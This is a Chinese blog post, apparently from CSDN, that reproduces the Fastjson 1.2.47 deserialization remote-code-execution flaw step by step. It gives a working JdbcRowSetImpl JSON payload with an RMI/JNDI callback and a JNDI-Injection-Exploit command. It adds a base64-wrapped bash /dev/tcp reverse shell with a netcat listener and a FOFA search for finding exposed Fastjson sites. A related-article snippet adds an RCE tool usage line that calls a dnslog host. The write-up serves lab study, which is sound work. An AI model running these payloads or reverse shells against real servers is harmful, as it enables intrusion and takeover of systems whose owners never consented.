fastjson_1.2.47 反序列化漏洞复现

最新推荐文章于 2023-11-07 09:21:09 发布
最新推荐文章于 2023-11-07 09:21:09 发布
阅读量254 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acdcccc/article/details/133044053
版权

fastjson_1.2.47_反序列化漏洞

说明内容
漏洞编号
漏洞名称fastjson 1.2.47 反序列化漏洞
漏洞评级高危
影响范围Fastjson<=1.2.47
漏洞描述fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
修复方案升级
打补丁
上设备

漏洞描述

fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

漏洞等级

高危

影响版本

  • Fastjson<=1.2.47

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
fastjson1.2.47

漏洞扫描

使用FastjsonScan进行扫描

  1. 登录界面,进行抓包

    image-20230919112636301

  2. 修改为request请求,添加变量,进行检测

    image-20230919112830055

  3. 使用插件Fastjson插件

    image-20230919112924235

  4. 扫描成功,得到poc

    image-20230919113001526

漏洞验证

  1. 使用Fastjson scan得到的poc

    {"axin":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"is":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://ebt3t9dkij5hrso4zfa49a0pvg16pv.oastify.com/aaa","autoCommit":true}}

  2. 使用JNDI-Injection-Exploit构造rmi服务器

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/cwc" -A "10.9.75.71"

    image-20230919113239813

  3. 在bp中发送rmi

    "dataSourceName":"rmi://10.9.75.71:1099/x3d285",

    image-20230919113333569

  4. 进入容器内部,查看是否生成文件

    image-20230919113416672

深度利用

GetShell

  1. 构造反弹Shell命令

    bash -i >& /dev/tcp/10.9.75.71/3333 0>&1
//进行base64编码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjcxLzMzMzMgMD4mMQ}|{base64,-d}|{bash,-i}

  2. kali中打开监听

    nc -lnvp 3333

  3. 将启动工具的命令进行更改

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjcxLzMzMzMgMD4mMQ}|{base64,-d}|{bash,-i}" -A "10.9.75.71"

    image-20230919114010738

  4. 使用生成的rmi或ldap进行测试

    "dataSourceName":"rmi://10.9.75.71:1099/zkrter",

    image-20230919114050183

  5. 反弹成功

    image-20230919114125752

漏洞挖掘

网络测绘

FOFA

"fastjson"

修复建议

cwangc000
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1288
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3365
Fastjson 1.2.47反序列化漏洞复现
fastjson1.2.47漏洞复现
m0_63699746的博客
07-05 718
​在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上可以说是标准的数据交换格式。相比1.2.24,1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,例如双写等绕过,但是并不阻挡hacker的攻击脚步,发现在fastjson中有一个全局缓存,当有类进行加载时,如果autoType没开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。浏览器输入ip:端口。
Fastjson 1.2.47 RCE漏洞复现
最新发布
wutiangui的博客
11-07 340
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。修改用户信息发现有回显。2.开启http服务。
fastjson 1.2.47漏洞复现
SUPER131110的博客
10-17 88
fastjsonscan找到poc。在tmp目录下写入lc文件。
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
Fastjson 1.2.47 远程代码执行漏洞详解及修复策略》 Fastjson,一个由阿里巴巴开发的高性能、轻量级的Java语言JSON处理库,因其高效的解析速度和广泛的功能,在国内的互联网行业中被广泛应用。然而,任何优秀的...
Fastjson反序列化漏洞史1
08-03
然而,Fastjson在过去的几年里曾曝出一系列的反序列化漏洞,这些漏洞可能被攻击者利用,执行任意代码,从而对系统安全构成威胁。 在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的...
fastjson-1.2.47官方jar包下载
09-05
《深入解析Fastjson-1.2.47官方jar包》 Fastjson是阿里巴巴开发的一款高效、强大的Java语言处理JSON的工具包,自其诞生以来,便以其卓越的性能和简洁的API,深受广大开发者喜爱。在Fastjson1.2.47版本中,我们...
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ...
fastjson-1.2.47及源码、简单示例
08-30
fastjson-1.2.47及源码、简单示例
fastjson-1.2.47-API文档-中文版.zip
04-08
赠送jar包:fastjson-1.2.47.jar; 赠送原API文档:fastjson-1.2.47-javadoc.jar; 赠送源代码:fastjson-1.2.47-sources.jar; 包含翻译后的API文档:fastjson-1.2.47-javadoc-API文档-中文(简体)版.zip 对应Maven信息:groupId:com.alibaba,artifactId:fastjson,version:1.2.47 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。
Fastjson命令执行漏洞复现2(fastjson <=1.2.47
szgyunyun的博客
06-29 927
一、搭建环境: https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce 提供的漏洞环境死活没复现出来只好自己搭建个环境了。 1、搭建tomcat环境 首先去tomcat官网下载tomcat https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.48/bin/apache-tomcat-9.0.48.tar.gz 2、将此压缩包复制到我的linux服务器上解压
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6294
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
Fastjson 反序列化漏洞
m0_65150886的博客
10-10 628
Fastjson1.2.24以及之前版本存在远程代码执行高危安全漏洞Fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链Fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
fastjson 1.2.47漏洞复现实战(vulfocus在线靶场CNVD-2017-02833)——关注紫灵小姐姐不踩坑】
weixin_40416851的博客
08-28 941
fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。...............
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3047
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
漏洞复现系列--fastjson<=1.2.47反序列化漏洞
梦之旅行地
07-27 2121
1.利用条件 fastjson <= 1.2.47 2.复现环境 靶机:vulhub靶场 攻击环境:一台公网vps,本地burp发送攻击数据包 3.具体步骤 1)docker起靶场 进入到vulhub靶场1.2.47-rce目录环境下 cd 1.2.47-rce docker-compose up -d 浏览器访问靶场环境如下 2)反弹shell命令制作 https://krober.biz/misc/reverse_shell.php?ip=122.51.255.154&port=94
fastjson 反序列化的时候 autoType is not support
张小凡
05-27 4765
网上一堆答案,官网给出的https://github.com/alibaba/fastjson/wiki/enable_autotype 我的问题其实很简单: { .... ErrorMsgObject errorMsgObject = new ErrorMsgObject(msg, req, e); errorMsgObject.setStatus("fai...
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
1. 利用Fastjson反序列化漏洞执行远程命令:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现远程命令执行。 2. 利用Fastjson反序列化漏洞实现文件读取:黑客可以构造一个恶意JSON字符串,通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值